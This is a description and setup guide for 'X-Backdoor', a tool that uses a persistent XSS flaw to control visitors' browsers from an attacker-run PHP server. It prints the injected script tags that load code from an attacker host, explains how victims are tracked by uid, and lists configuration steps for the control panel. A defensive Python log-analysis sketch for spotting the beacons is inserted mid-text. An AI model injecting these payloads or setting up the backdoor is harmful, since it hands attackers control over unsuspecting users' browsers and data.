X-Backdoor is a tool that takes advantage of a persistent XSS vulnerability. The idea is to play with and explore modern browsers' capabilities and the impact these can have when someone can control the clients.
You have a target site and an attacker site. The attacker site hosts all the files of the project:
– db.php – Contains the database configuration
– getjs.php – Sends JS code to the client
– acp/ – Contains all the files to administer the backdoor
Now the attacker injects (with a persistent XSS) this piece of code into the target site:
<script id="scr72" src="http://attackersite/getjs.php"></script>
<script id="scr72" src="http://attackersite/getjs.php?r=2366&uid=7278&data=somereply"></script>
When a client visits the infected page on the target site for the first time, a random number (its uid) is generated and the client sends a special message to the attacker's PHP script. The uid is saved in localStorage and in a cookie, so the browser remembers its uid. To get a new registration from the same user, the attacker has to send code that deletes the cookie and clears the localStorage.
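Seen from the defending side, the requests described above have a recognizable shape in proxy logs: a script fetched from a foreign host, repeated with the same uid and carrying r, uid and data in the query string. The following detection sketch is an added example, not part of the X-Backdoor project; the three-column log format, the host names and the `find_beacons` helper are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed proxy log lines: "<client> <requested URL> <referer>"
SAMPLE_LOG = """\
10.0.0.5 http://cdn.example.net/lib.js?v=3 http://target.example/forum/1
10.0.0.5 http://collector.example/getjs.php http://target.example/forum/1
10.0.0.5 http://collector.example/getjs.php?r=2366&uid=7278&data=somereply http://target.example/forum/1
10.0.0.5 http://collector.example/getjs.php?r=9120&uid=7278&data= http://target.example/forum/1
10.0.0.5 http://collector.example/getjs.php?r=4471&uid=7278&data=x http://target.example/profile
10.0.0.9 http://target.example/app.js?uid=1&data=2&r=3 http://target.example/home
"""

# Query parameter names shown in the injected script tag on this page.
BEACON_KEYS = {"r", "uid", "data"}


def find_beacons(log_text, min_hits=2):
    """Return {(script_host, uid): sorted referer pages} for cross-origin
    requests that carry r, uid and data and repeat at least min_hits times."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        _client, url, referer = parts
        req, ref = urlsplit(url), urlsplit(referer)
        # keep_blank_values so an empty "data=" still counts as present
        query = parse_qs(req.query, keep_blank_values=True)
        if not BEACON_KEYS.issubset(query):
            continue  # not the parameter set described on the page
        if req.hostname == ref.hostname:
            continue  # same-origin request: the site's own script
        hits[(req.hostname, query["uid"][0])].append(referer)
    return {k: sorted(set(v)) for k, v in hits.items() if len(v) >= min_hits}


if __name__ == "__main__":
    for (host, uid), pages in find_beacons(SAMPLE_LOG).items():
        print(f"possible XSS beacon: host={host} uid={uid} pages={pages}")
```

The referer pages in the result point at where the stored script tag is being served from, which is where cleanup and output-encoding fixes belong.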
The database schema is in db_dump.sql; you can execute the queries manually or import the file with phpMyAdmin. The database already contains some functions. See funclib.md for more functions.
Edit the following files:
+ acp/login.php – Edit the default login password
+ db.php – Insert your database configuration
+ getjs.php – Set some parameters